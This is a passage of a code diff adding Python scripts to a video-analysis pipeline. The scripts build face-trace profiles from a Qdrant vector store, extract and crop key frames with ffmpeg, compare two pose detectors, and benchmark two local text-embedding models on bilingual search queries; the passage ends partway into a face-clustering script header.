||||
|
||||
url = f"{QDRANT_URL}/collections/{FACES_COLLECTION}/points/scroll"
|
||||
data = json.dumps(body).encode()
|
||||
req = urllib.request.Request(url, data=data, method="POST")
|
||||
req.add_header("Content-Type", "application/json")
|
||||
req.add_header("Api-Key", QDRANT_API_KEY)
|
||||
|
||||
with urllib.request.urlopen(req) as resp:
|
||||
return json.loads(resp.read())
|
||||
|
||||
|
||||
def scroll_all(filter_dict, with_payload=None):
|
||||
"""Scroll all matching points."""
|
||||
all_points = []
|
||||
offset = None
|
||||
while True:
|
||||
result = qdrant_scroll(filter_dict, offset=offset, with_payload=with_payload)
|
||||
points = result.get("result", {}).get("points", [])
|
||||
if not points:
|
||||
break
|
||||
all_points.extend(points)
|
||||
offset = result.get("result", {}).get("next_page_offset")
|
||||
if not offset or len(points) < BATCH_SIZE:
|
||||
break
|
||||
return all_points
|
||||
|
||||
|
||||
def get_video_path(file_uuid):
|
||||
"""Get video file path from database."""
|
||||
psql = "/opt/homebrew/Cellar/libpq/18.4/bin/psql"
|
||||
result = subprocess.run(
|
||||
[psql, "-U", "accusys", "-d", "momentry", "-t", "-A", "-c",
|
||||
f"SELECT file_path FROM videos WHERE file_uuid = '{file_uuid}'"],
|
||||
capture_output=True, text=True
|
||||
)
|
||||
if result.returncode == 0 and result.stdout.strip():
|
||||
return result.stdout.strip()
|
||||
return None
|
||||
|
||||
|
||||
def extract_key_frame(video_path, frame_num, fps, output_path):
|
||||
"""Extract a specific frame from video using ffmpeg."""
|
||||
if fps <= 0:
|
||||
return False
|
||||
timestamp = frame_num / fps
|
||||
try:
|
||||
result = subprocess.run(
|
||||
["ffmpeg", "-y", "-ss", f"{timestamp:.3f}",
|
||||
"-i", video_path,
|
||||
"-vframes", "1", "-vf", "scale=640:-1", "-q:v", "5",
|
||||
output_path],
|
||||
capture_output=True, timeout=30
|
||||
)
|
||||
return result.returncode == 0 and os.path.exists(output_path)
|
||||
except Exception as e:
|
||||
print(f" key_frame extraction failed: {e}", file=sys.stderr)
|
||||
return False
|
||||
|
||||
|
||||
def crop_key_face(key_frame_path, bbox, output_path):
|
||||
"""Crop key_face from key_frame using bbox."""
|
||||
x, y, w, h = bbox["x"], bbox["y"], bbox["width"], bbox["height"]
|
||||
if w <= 0 or h <= 0:
|
||||
return False
|
||||
try:
|
||||
result = subprocess.run(
|
||||
["ffmpeg", "-y", "-i", key_frame_path,
|
||||
"-vf", f"crop={w}:{h}:{x}:{y}",
|
||||
"-q:v", "2", output_path],
|
||||
capture_output=True, timeout=10
|
||||
)
|
||||
return result.returncode == 0 and os.path.exists(output_path)
|
||||
except Exception as e:
|
||||
print(f" key_face crop failed: {e}", file=sys.stderr)
|
||||
return False
|
||||
|
||||
|
||||
def build_trace_profiles(file_uuid=None, dry_run=False):
|
||||
"""Build trace profiles from Qdrant _faces data."""
|
||||
# Get all unique file_uuids with trace_id >= 0
|
||||
if file_uuid:
|
||||
file_uuids = [file_uuid]
|
||||
else:
|
||||
print("Scanning Qdrant for all file_uuids with trace_id >= 0...")
|
||||
points = scroll_all(
|
||||
{"must": [{"key": "trace_id", "range": {"gte": 0}}]},
|
||||
with_payload={"include": ["file_uuid"]}
|
||||
)
|
||||
file_uuids = sorted(set(p["payload"]["file_uuid"] for p in points))
|
||||
print(f"Found {len(file_uuids)} files with trace data")
|
||||
|
||||
total_profiles = 0
|
||||
for fid in file_uuids:
|
||||
print(f"\n--- {fid} ---")
|
||||
|
||||
# Scroll all points for this file with trace_id >= 0
|
||||
points = scroll_all(
|
||||
{
|
||||
"must": [
|
||||
{"key": "file_uuid", "match": {"value": fid}},
|
||||
{"key": "trace_id", "range": {"gte": 0}},
|
||||
]
|
||||
},
|
||||
with_payload={"include": ["frame", "trace_id", "bbox", "confidence"]}
|
||||
)
|
||||
|
||||
if not points:
|
||||
print(" No points with trace_id >= 0")
|
||||
continue
|
||||
|
||||
# Group by trace_id
|
||||
traces = defaultdict(list)
|
||||
for p in points:
|
||||
pl = p["payload"]
|
||||
tid = pl.get("trace_id", 0)
|
||||
traces[tid].append({
|
||||
"frame": pl["frame"],
|
||||
"bbox": pl.get("bbox", {}),
|
||||
"confidence": pl.get("confidence", 0.0),
|
||||
})
|
||||
|
||||
print(f" {len(points)} points, {len(traces)} traces")
|
||||
|
||||
# Get video path
|
||||
video_path = get_video_path(fid)
|
||||
if not video_path or not os.path.exists(video_path):
|
||||
print(f" Video not found, skipping key_frame extraction")
|
||||
video_path = None
|
||||
|
||||
# Get FPS from DB
|
||||
fps = 30.0
|
||||
if video_path:
|
||||
psql = "/opt/homebrew/Cellar/libpq/18.4/bin/psql"
|
||||
result = subprocess.run(
|
||||
[psql, "-U", "accusys", "-d", "momentry", "-t", "-A", "-c",
|
||||
f"SELECT COALESCE(fps, 30.0) FROM videos WHERE file_uuid = '{fid}'"],
|
||||
capture_output=True, text=True
|
||||
)
|
||||
if result.returncode == 0 and result.stdout.strip():
|
||||
try:
|
||||
fps = float(result.stdout.strip())
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
for tid, faces in sorted(traces.items()):
|
||||
if tid < 0:
|
||||
continue
|
||||
|
||||
frames = [f["frame"] for f in faces]
|
||||
confidences = [f["confidence"] for f in faces]
|
||||
frame_count = len(faces)
|
||||
start_frame = min(frames)
|
||||
end_frame = max(frames)
|
||||
avg_confidence = sum(confidences) / frame_count if frame_count > 0 else 0.0
|
||||
|
||||
# Representative frame: highest confidence
|
||||
best = max(faces, key=lambda f: f["confidence"])
|
||||
best_frame = best["frame"]
|
||||
best_bbox = best["bbox"]
|
||||
|
||||
trace_dir = os.path.join(OUTPUT_DIR, fid, f"trace_{tid}")
|
||||
profile_path = os.path.join(trace_dir, "trace_profile.json")
|
||||
kf_path = os.path.join(trace_dir, "key_frame.jpg")
|
||||
face_path = os.path.join(trace_dir, "key_face.jpg")
|
||||
|
||||
profile = {
|
||||
"version": "1.0",
|
||||
"file_uuid": fid,
|
||||
"trace_id": tid,
|
||||
"label": "",
|
||||
"frame_count": frame_count,
|
||||
"start_frame": start_frame,
|
||||
"end_frame": end_frame,
|
||||
"avg_confidence": round(avg_confidence, 6),
|
||||
"key_frame": "key_frame.jpg" if os.path.exists(kf_path) else None,
|
||||
"key_face": "key_face.jpg" if os.path.exists(face_path) else None,
|
||||
"status": "pending",
|
||||
}
|
||||
|
||||
if dry_run:
|
||||
print(f" trace_{tid}: {frame_count} frames [{start_frame}-{end_frame}] "
|
||||
f"conf={avg_confidence:.3f} best_frame={best_frame}")
|
||||
continue
|
||||
|
||||
os.makedirs(trace_dir, exist_ok=True)
|
||||
|
||||
# Extract key_frame.jpg if not exists
|
||||
if not os.path.exists(kf_path) and video_path:
|
||||
extract_key_frame(video_path, best_frame, fps, kf_path)
|
||||
if os.path.exists(kf_path):
|
||||
profile["key_frame"] = "key_frame.jpg"
|
||||
|
||||
# Crop key_face.jpg from key_frame if not exists
|
||||
if not os.path.exists(face_path) and os.path.exists(kf_path) and best_bbox:
|
||||
crop_key_face(kf_path, best_bbox, face_path)
|
||||
if os.path.exists(face_path):
|
||||
profile["key_face"] = "key_face.jpg"
|
||||
|
||||
# Write trace_profile.json
|
||||
with open(profile_path, "w") as f:
|
||||
json.dump(profile, f, indent=2, ensure_ascii=False)
|
||||
|
||||
total_profiles += 1
|
||||
|
||||
if not dry_run:
|
||||
print(f" Created {len([t for t in traces if t >= 0])} trace profiles")
|
||||
|
||||
print(f"\nDone: {total_profiles} trace profiles created")
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Backfill trace profiles from Qdrant")
|
||||
parser.add_argument("--file-uuid", help="Process only this file UUID")
|
||||
parser.add_argument("--dry-run", action="store_true", help="Show what would be created")
|
||||
args = parser.parse_args()
|
||||
|
||||
build_trace_profiles(file_uuid=args.file_uuid, dry_run=args.dry_run)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,148 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Compare Apple Vision pose vs MediaPipe pose
|
||||
|
||||
Finds:
|
||||
- Intersection: Poses detected by both
|
||||
- Apple Vision only: Poses only in Apple Vision
|
||||
- MediaPipe only: Poses only in MediaPipe
|
||||
|
||||
Usage:
|
||||
python3 scripts/compare_pose_detections.py --file-uuid <uuid>
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
def load_apple_vision_poses(file_uuid, output_dir):
|
||||
"""Load Apple Vision pose data from pose.json"""
|
||||
pose_path = Path(output_dir) / f"{file_uuid}.pose.json"
|
||||
|
||||
if not pose_path.exists():
|
||||
return {}
|
||||
|
||||
with open(pose_path) as f:
|
||||
data = json.load(f)
|
||||
|
||||
poses = {}
|
||||
for frame in data.get('frames', []):
|
||||
frame_num = frame.get('frame', frame.get('frame_number', 0))
|
||||
for i, person in enumerate(frame.get('persons', [])):
|
||||
pose_key = f"frame_{frame_num}_person_{i}"
|
||||
poses[pose_key] = {
|
||||
'frame': frame_num,
|
||||
'person_idx': i,
|
||||
'keypoints': person.get('keypoints', []),
|
||||
'source': 'apple_vision'
|
||||
}
|
||||
|
||||
return poses
|
||||
|
||||
|
||||
def load_mediapipe_poses(file_uuid, output_dir):
|
||||
"""Load MediaPipe pose data from pose.mediapipe.json"""
|
||||
pose_path = Path(output_dir) / f"{file_uuid}.pose.mediapipe.json"
|
||||
|
||||
if not pose_path.exists():
|
||||
return {}
|
||||
|
||||
with open(pose_path) as f:
|
||||
data = json.load(f)
|
||||
|
||||
poses = {}
|
||||
for frame in data.get('frames', []):
|
||||
frame_num = frame.get('frame', 0)
|
||||
for i, person in enumerate(frame.get('persons', [])):
|
||||
pose_key = f"frame_{frame_num}_person_{i}"
|
||||
poses[pose_key] = {
|
||||
'frame': frame_num,
|
||||
'person_idx': i,
|
||||
'keypoints': person.get('keypoints', []),
|
||||
'source': 'mediapipe'
|
||||
}
|
||||
|
||||
return poses
|
||||
|
||||
|
||||
def compare_poses(file_uuid, output_dir):
|
||||
"""Compare Apple Vision vs MediaPipe poses."""
|
||||
|
||||
print(f"[compare] Loading pose data for {file_uuid}...")
|
||||
|
||||
av_poses = load_apple_vision_poses(file_uuid, output_dir)
|
||||
mp_poses = load_mediapipe_poses(file_uuid, output_dir)
|
||||
|
||||
print(f"[compare] Apple Vision poses: {len(av_poses)}")
|
||||
print(f"[compare] MediaPipe poses: {len(mp_poses)}")
|
||||
|
||||
# Find intersection and differences
|
||||
av_keys = set(av_poses.keys())
|
||||
mp_keys = set(mp_poses.keys())
|
||||
|
||||
intersection = av_keys & mp_keys
|
||||
av_only = av_keys - mp_keys
|
||||
mp_only = mp_keys - av_keys
|
||||
|
||||
print(f"\n[compare] === COMPARISON ===")
|
||||
print(f"[compare] Intersection (both detected): {len(intersection)}")
|
||||
print(f"[compare] Apple Vision only: {len(av_only)}")
|
||||
print(f"[compare] MediaPipe only: {len(mp_only)}")
|
||||
|
||||
# Analyze intersection - check alignment
|
||||
intersection_aligned = 0
|
||||
for key in intersection:
|
||||
av_pose = av_poses[key]
|
||||
mp_pose = mp_poses[key]
|
||||
|
||||
# Check if both have face keypoints
|
||||
av_face_kps = [kp for kp in av_pose.get('keypoints', []) if kp.get('name') in ['nose', 'left_eye', 'right_eye']]
|
||||
mp_face_kps = [kp for kp in mp_pose.get('keypoints', []) if kp.get('name') in ['nose', 'left_eye', 'right_eye']]
|
||||
|
||||
if av_face_kps and mp_face_kps:
|
||||
intersection_aligned += 1
|
||||
|
||||
print(f"\n[compare] Intersection with face keypoints: {intersection_aligned}")
|
||||
|
||||
# Frame coverage
|
||||
av_frames = set(av_poses[k]['frame'] for k in av_keys)
|
||||
mp_frames = set(mp_poses[k]['frame'] for k in mp_keys)
|
||||
|
||||
print(f"\n[compare] === FRAME COVERAGE ===")
|
||||
print(f"[compare] Apple Vision frames: {len(av_frames)}")
|
||||
print(f"[compare] MediaPipe frames: {len(mp_frames)}")
|
||||
print(f"[compare] Overlapping frames: {len(av_frames & mp_frames)}")
|
||||
|
||||
# Save results
|
||||
output_path = Path(output_dir) / f"{file_uuid}.pose_comparison.json"
|
||||
with open(output_path, 'w') as f:
|
||||
json.dump({
|
||||
'apple_vision_count': len(av_poses),
|
||||
'mediapipe_count': len(mp_poses),
|
||||
'intersection_count': len(intersection),
|
||||
'apple_vision_only_count': len(av_only),
|
||||
'mediapipe_only_count': len(mp_only),
|
||||
'intersection_aligned_count': intersection_aligned,
|
||||
'apple_vision_frames': len(av_frames),
|
||||
'mediapipe_frames': len(mp_frames),
|
||||
'overlapping_frames': len(av_frames & mp_frames),
|
||||
'intersection_keys': sorted(list(intersection))[:100], # Sample
|
||||
'apple_vision_only_keys': sorted(list(av_only))[:100],
|
||||
'mediapipe_only_keys': sorted(list(mp_only))[:100],
|
||||
}, f, indent=2)
|
||||
|
||||
print(f"\n[compare] Results saved to: {output_path}")
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Compare pose detections")
|
||||
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
|
||||
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
|
||||
args = parser.parse_args()
|
||||
|
||||
compare_poses(args.file_uuid, args.output_dir)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,146 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Cut Key Frame Extraction - Extract representative frames from each scene for VLM analysis
|
||||
|
||||
For each scene in cut.json, extracts the middle frame as a key frame.
|
||||
Output: {uuid}_scene_{n}.jpg files in output directory
|
||||
|
||||
Usage:
|
||||
python cut_key_frame.py --file-uuid abc123 --video /path/to/video.mp4 --cut-json /path/to/cut.json
|
||||
python cut_key_frame.py --file-uuid abc123 --video /path/to/video.mp4 --cut-json /path/to/cut.json --output-dir /custom/output
|
||||
|
||||
Output:
|
||||
{output_dir}/{uuid}_scene_1.jpg
|
||||
{output_dir}/{uuid}_scene_2.jpg
|
||||
...
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import subprocess
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
def extract_frame(video_path: str, frame_number: int, output_path: str) -> bool:
|
||||
"""
|
||||
Extract a single frame from video using ffmpeg.
|
||||
|
||||
Args:
|
||||
video_path: Path to video file
|
||||
frame_number: Frame number to extract (0-indexed)
|
||||
output_path: Output path for the frame
|
||||
|
||||
Returns:
|
||||
True if successful, False otherwise
|
||||
"""
|
||||
cmd = [
|
||||
"ffmpeg", "-y", "-v", "quiet",
|
||||
"-i", video_path,
|
||||
"-vf", f"select=eq(n\\,{frame_number})",
|
||||
"-vframes", "1",
|
||||
"-q:v", "2",
|
||||
output_path
|
||||
]
|
||||
|
||||
result = subprocess.run(cmd, capture_output=True)
|
||||
return result.returncode == 0
|
||||
|
||||
|
||||
def extract_scene_key_frames(
|
||||
file_uuid: str,
|
||||
video_path: str,
|
||||
cut_json_path: str,
|
||||
output_dir: str,
|
||||
) -> dict:
|
||||
"""
|
||||
Extract key frames from each scene in cut.json.
|
||||
|
||||
Args:
|
||||
file_uuid: File UUID
|
||||
video_path: Path to video file
|
||||
cut_json_path: Path to cut.json
|
||||
output_dir: Output directory for key frames
|
||||
|
||||
Returns:
|
||||
Dict with scenes processed and output paths
|
||||
"""
|
||||
# Read cut.json
|
||||
with open(cut_json_path, 'r') as f:
|
||||
cut_data = json.load(f)
|
||||
|
||||
scenes = cut_data.get("scenes", [])
|
||||
if not scenes:
|
||||
print(f"No scenes found in {cut_json_path}", file=sys.stderr)
|
||||
return {"scenes": [], "output_dir": output_dir}
|
||||
|
||||
fps = cut_data.get("fps", 24.0)
|
||||
|
||||
output_path = Path(output_dir)
|
||||
output_path.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
results = []
|
||||
|
||||
for scene in scenes:
|
||||
scene_number = scene.get("scene_number", 0)
|
||||
start_frame = scene.get("start_frame", 0)
|
||||
end_frame = scene.get("end_frame", 0)
|
||||
|
||||
# Extract middle frame
|
||||
middle_frame = (start_frame + end_frame) // 2
|
||||
|
||||
# Output path
|
||||
output_file = output_path / f"{file_uuid}_scene_{scene_number}.jpg"
|
||||
|
||||
# Extract frame
|
||||
success = extract_frame(video_path, middle_frame, str(output_file))
|
||||
|
||||
results.append({
|
||||
"scene_number": scene_number,
|
||||
"middle_frame": middle_frame,
|
||||
"start_frame": start_frame,
|
||||
"end_frame": end_frame,
|
||||
"output_path": str(output_file),
|
||||
"success": success,
|
||||
})
|
||||
|
||||
if success:
|
||||
print(f"[CUT_KEY_FRAME] Scene {scene_number}: frame {middle_frame} -> {output_file}")
|
||||
else:
|
||||
print(f"[CUT_KEY_FRAME] Scene {scene_number}: FAILED to extract frame {middle_frame}", file=sys.stderr)
|
||||
|
||||
return {
|
||||
"file_uuid": file_uuid,
|
||||
"total_scenes": len(scenes),
|
||||
"scenes": results,
|
||||
"output_dir": str(output_dir),
|
||||
}
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Extract key frames from scenes for VLM analysis")
|
||||
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
|
||||
parser.add_argument("--video", "-v", required=True, help="Video file path")
|
||||
parser.add_argument("--cut-json", "-c", required=True, help="cut.json path")
|
||||
parser.add_argument("--output-dir", "-o", default=None, help="Output directory (default: same as cut.json)")
|
||||
parser.add_argument("--json", "-j", action="store_true", help="Output as JSON")
|
||||
args = parser.parse_args()
|
||||
|
||||
# Default output dir to same as cut.json
|
||||
output_dir = args.output_dir or str(Path(args.cut_json).parent)
|
||||
|
||||
result = extract_scene_key_frames(
|
||||
args.file_uuid,
|
||||
args.video,
|
||||
args.cut_json,
|
||||
output_dir,
|
||||
)
|
||||
|
||||
if args.json:
|
||||
print(json.dumps(result, indent=2))
|
||||
else:
|
||||
print(f"Extracted {result['total_scenes']} scene key frames to {result['output_dir']}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,286 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Embedding Model Evaluation - Compare embeddinggemma vs nomic-embed-text-v2-moe
|
||||
|
||||
Usage:
|
||||
python3 scripts/eval_embedding_models.py --file-uuid <uuid> --output-dir /path/to/output
|
||||
|
||||
Metrics:
|
||||
1. Accuracy: Semantic similarity ranking quality
|
||||
2. Speed: Latency per embedding
|
||||
3. Dimension: Vector size
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import math
|
||||
import os
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
import requests
|
||||
except ImportError:
|
||||
print("requests not installed: pip install requests", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
# Embedding endpoints
|
||||
EMBED_A_URL = "http://localhost:11436/v1/embeddings" # embeddinggemma
|
||||
EMBED_B_URL = "http://localhost:11434/api/embed" # nomic-embed-text-v2-moe
|
||||
EMBED_B_MODEL = "nomic-embed-text-v2-moe"
|
||||
|
||||
# Test queries (Chinese, English, Mixed)
|
||||
TEST_QUERIES = [
|
||||
{"query": "穿西裝的男人", "lang": "zh"},
|
||||
{"query": "室內辦公室", "lang": "zh"},
|
||||
{"query": "雪景", "lang": "zh"},
|
||||
{"query": "持槍的人", "lang": "zh"},
|
||||
{"query": "woman in white dress", "lang": "en"},
|
||||
{"query": "outdoor scene night", "lang": "en"},
|
||||
{"query": "person holding object", "lang": "en"},
|
||||
{"query": "穿著 formal 的男人", "lang": "mixed"},
|
||||
]
|
||||
|
||||
|
||||
def get_embedding_a(text: str) -> tuple:
|
||||
"""Get embedding from embeddinggemma (port 11436)."""
|
||||
start = time.time()
|
||||
try:
|
||||
resp = requests.post(EMBED_A_URL, json={"input": text}, timeout=30)
|
||||
resp.raise_for_status()
|
||||
data = resp.json()
|
||||
elapsed = time.time() - start
|
||||
return data["data"][0]["embedding"], elapsed
|
||||
except Exception as e:
|
||||
print(f"[eval] embeddinggemma error: {e}", file=sys.stderr)
|
||||
return [], 0
|
||||
|
||||
|
||||
def get_embedding_b(text: str) -> tuple:
|
||||
"""Get embedding from nomic-embed-text-v2-moe (port 11434)."""
|
||||
start = time.time()
|
||||
try:
|
||||
resp = requests.post(EMBED_B_URL, json={"model": EMBED_B_MODEL, "input": text}, timeout=30)
|
||||
resp.raise_for_status()
|
||||
data = resp.json()
|
||||
elapsed = time.time() - start
|
||||
return data["embeddings"][0], elapsed
|
||||
except Exception as e:
|
||||
print(f"[eval] nomic error: {e}", file=sys.stderr)
|
||||
return [], 0
|
||||
|
||||
|
||||
def cosine_similarity(a: list, b: list) -> float:
|
||||
"""Calculate cosine similarity."""
|
||||
if not a or not b or len(a) != len(b):
|
||||
return 0.0
|
||||
dot = sum(x * y for x, y in zip(a, b))
|
||||
norm_a = math.sqrt(sum(x * x for x in a))
|
||||
norm_b = math.sqrt(sum(y * y for y in b))
|
||||
return dot / (norm_a * norm_b) if norm_a > 0 and norm_b > 0 else 0.0
|
||||
|
||||
|
||||
def load_vlm_descriptions(file_uuid: str, output_dir: str) -> list:
|
||||
"""Load VLM descriptions from trace/scene/interval profiles."""
|
||||
descriptions = []
|
||||
output_path = Path(output_dir)
|
||||
|
||||
# Load trace profiles
|
||||
trace_dir = output_path / file_uuid
|
||||
if trace_dir.exists():
|
||||
for trace_path in sorted(trace_dir.glob("trace_*")):
|
||||
profile_path = trace_path / "trace_profile.json"
|
||||
if profile_path.exists():
|
||||
with open(profile_path) as f:
|
||||
profile = json.load(f)
|
||||
desc = profile.get("vlm_description", "")
|
||||
if desc:
|
||||
descriptions.append({
|
||||
"id": f"trace_{profile.get('trace_id', 0)}",
|
||||
"type": "trace",
|
||||
"text": desc,
|
||||
})
|
||||
|
||||
# Load scene profiles
|
||||
scene_profile = output_path / f"{file_uuid}_scene_profile.json"
|
||||
if scene_profile.exists():
|
||||
with open(scene_profile) as f:
|
||||
data = json.load(f)
|
||||
for scene in data.get("scenes", []):
|
||||
desc = scene.get("vlm_description", "")
|
||||
if desc:
|
||||
descriptions.append({
|
||||
"id": f"scene_{scene.get('scene_number', 0)}",
|
||||
"type": "scene",
|
||||
"text": desc,
|
||||
})
|
||||
|
||||
# Load interval profiles
|
||||
interval_profile = output_path / f"{file_uuid}_interval_profile.json"
|
||||
if interval_profile.exists():
|
||||
with open(interval_profile) as f:
|
||||
data = json.load(f)
|
||||
for interval in data.get("intervals", []):
|
||||
desc = interval.get("vlm_description", "")
|
||||
if desc:
|
||||
descriptions.append({
|
||||
"id": f"interval_{interval.get('interval_index', 0)}",
|
||||
"type": "interval",
|
||||
"text": desc,
|
||||
"timestamp_sec": interval.get("timestamp_sec", 0),
|
||||
})
|
||||
|
||||
return descriptions
|
||||
|
||||
|
||||
def evaluate_model(get_embedding_fn, name: str, descriptions: list, queries: list) -> dict:
|
||||
"""Evaluate a single model."""
|
||||
print(f"\n[eval] Evaluating {name}...")
|
||||
|
||||
results = {
|
||||
"model": name,
|
||||
"dimension": None,
|
||||
"avg_latency_ms": 0,
|
||||
"total_embeddings": 0,
|
||||
"test_results": [],
|
||||
}
|
||||
|
||||
# Embed all VLM descriptions
|
||||
vlm_embeddings = []
|
||||
total_latency = 0
|
||||
|
||||
for i, desc in enumerate(descriptions[:100]): # Limit to 100 for speed
|
||||
emb, latency = get_embedding_fn(desc["text"])
|
||||
total_latency += latency
|
||||
|
||||
if emb:
|
||||
vlm_embeddings.append({
|
||||
"id": desc["id"],
|
||||
"type": desc["type"],
|
||||
"text": desc["text"],
|
||||
"embedding": emb,
|
||||
})
|
||||
|
||||
if results["dimension"] is None:
|
||||
results["dimension"] = len(emb)
|
||||
|
||||
if (i + 1) % 20 == 0:
|
||||
print(f"[eval] Embedded {i+1}/{min(len(descriptions), 100)}...")
|
||||
|
||||
results["total_embeddings"] = len(vlm_embeddings)
|
||||
if vlm_embeddings:
|
||||
results["avg_latency_ms"] = round(total_latency / len(vlm_embeddings) * 1000, 1)
|
||||
|
||||
# Test queries
|
||||
for test in queries:
|
||||
query_emb, latency = get_embedding_fn(test["query"])
|
||||
if not query_emb:
|
||||
continue
|
||||
|
||||
# Find top-5 similar
|
||||
similarities = []
|
||||
for vlm in vlm_embeddings:
|
||||
sim = cosine_similarity(query_emb, vlm["embedding"])
|
||||
similarities.append({
|
||||
"id": vlm["id"],
|
||||
"type": vlm["type"],
|
||||
"text": vlm["text"][:100],
|
||||
"score": round(sim, 4),
|
||||
})
|
||||
|
||||
similarities.sort(key=lambda x: x["score"], reverse=True)
|
||||
top5 = similarities[:5]
|
||||
|
||||
results["test_results"].append({
|
||||
"query": test["query"],
|
||||
"lang": test["lang"],
|
||||
"latency_ms": round(latency * 1000, 1),
|
||||
"top5": top5,
|
||||
})
|
||||
|
||||
return results
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Embedding model evaluation")
|
||||
parser.add_argument("--file-uuid", "-u", help="File UUID for VLM data")
|
||||
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
|
||||
parser.add_argument("--limit", "-l", type=int, default=100, help="Max VLM descriptions to embed")
|
||||
args = parser.parse_args()
|
||||
|
||||
print("=" * 70)
|
||||
print("Embedding Model Evaluation")
|
||||
print("=" * 70)
|
||||
|
||||
# Load VLM descriptions
|
||||
descriptions = []
|
||||
if args.file_uuid:
|
||||
descriptions = load_vlm_descriptions(args.file_uuid, args.output_dir)
|
||||
print(f"\n[eval] Loaded {len(descriptions)} VLM descriptions from {args.file_uuid}")
|
||||
|
||||
if not descriptions:
|
||||
print("[eval] No VLM descriptions found. Using sample data...")
|
||||
descriptions = [
|
||||
{"id": "sample_1", "type": "sample", "text": "A person wearing a red shirt and black pants standing in an office."},
|
||||
{"id": "sample_2", "type": "sample", "text": "Two people in a meeting room, one wearing glasses and formal attire."},
|
||||
{"id": "sample_3", "type": "sample", "text": "A woman holding a small brown dog outdoors on a sunny day."},
|
||||
{"id": "sample_4", "type": "sample", "text": "Night scene on a busy street with cars and pedestrians."},
|
||||
{"id": "sample_5", "type": "sample", "text": "Person in casual clothing sitting at a desk in an office."},
|
||||
]
|
||||
|
||||
# Evaluate Model A (embeddinggemma)
|
||||
results_a = evaluate_model(get_embedding_a, "embeddinggemma", descriptions, TEST_QUERIES)
|
||||
|
||||
# Evaluate Model B (nomic-embed-text-v2-moe)
|
||||
results_b = evaluate_model(get_embedding_b, "nomic-embed-text-v2-moe", descriptions, TEST_QUERIES)
|
||||
|
||||
# Print comparison
|
||||
print("\n" + "=" * 70)
|
||||
print("COMPARISON RESULTS")
|
||||
print("=" * 70)
|
||||
print(f"\n| Metric | embeddinggemma | nomic-embed-text-v2-moe |")
|
||||
print(f"|--------|----------------|--------------------------|")
|
||||
print(f"| Dimension | {results_a.get('dimension', 'N/A')} | {results_b.get('dimension', 'N/A')} |")
|
||||
print(f"| Avg Latency | {results_a.get('avg_latency_ms', 'N/A')}ms | {results_b.get('avg_latency_ms', 'N/A')}ms |")
|
||||
print(f"| Total Embedded | {results_a.get('total_embeddings', 0)} | {results_b.get('total_embeddings', 0)} |")
|
||||
|
||||
# Show test query results
|
||||
print("\n" + "-" * 70)
|
||||
print("TOP-5 RESULTS PER QUERY")
|
||||
print("-" * 70)
|
||||
|
||||
for i, test in enumerate(TEST_QUERIES):
|
||||
print(f"\nQuery: {test['query']} ({test['lang']})")
|
||||
|
||||
if i < len(results_a.get("test_results", [])):
|
||||
print(f" embeddinggemma Top-5:")
|
||||
for r in results_a["test_results"][i]["top5"]:
|
||||
print(f" {r['id']}: {r['score']:.4f} - {r['text'][:50]}...")
|
||||
|
||||
if i < len(results_b.get("test_results", [])):
|
||||
print(f" nomic Top-5:")
|
||||
for r in results_b["test_results"][i]["top5"]:
|
||||
print(f" {r['id']}: {r['score']:.4f} - {r['text'][:50]}...")
|
||||
|
||||
# Save results
|
||||
output = {
|
||||
"embeddinggemma": results_a,
|
||||
"nomic-embed-text-v2-moe": results_b,
|
||||
"comparison": {
|
||||
"dimension_a": results_a.get("dimension"),
|
||||
"dimension_b": results_b.get("dimension"),
|
||||
"latency_diff_ms": (results_b.get("avg_latency_ms", 0) or 0) - (results_a.get("avg_latency_ms", 0) or 0),
|
||||
},
|
||||
"queries": TEST_QUERIES,
|
||||
}
|
||||
|
||||
output_file = "embedding_eval_results.json"
|
||||
with open(output_file, "w") as f:
|
||||
json.dump(output, f, indent=2)
|
||||
|
||||
print(f"\n[eval] Results saved to: {output_file}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -1,246 +1,205 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Face Clustering Processor
|
||||
職責:將短暫的 Face ID 聚合為持續的 Person ID,並自動綁定 Speaker。
|
||||
Face Clustering Processor V3 - Single-stage trace clustering (Stage 2 merge removed)
|
||||
|
||||
Strategy:
|
||||
1. Load face embeddings from Qdrant _faces collection
|
||||
2. Group by trace_id, compute weighted average embedding per trace
|
||||
3. Single-stage AgglomerativeClustering (no Stage 2 merge)
|
||||
4. Assign person_id to all faces in each trace
|
||||
5. Output face_cluster.json with auto speaker binding
|
||||
|
||||
Output format:
|
||||
{"status", "file_uuid", "clusters": [{cluster_id, face_count, representative_face}], "frames": [{frame, timestamp, faces: [{face_id, cluster_id, confidence}]}]}
|
||||
|
||||
Changes from V2:
|
||||
- Added argparse for CLI arguments
|
||||
- Added Redis progress reporting
|
||||
- Added status + file_uuid to output
|
||||
- Added auto_bind_speakers() integration
|
||||
|
||||
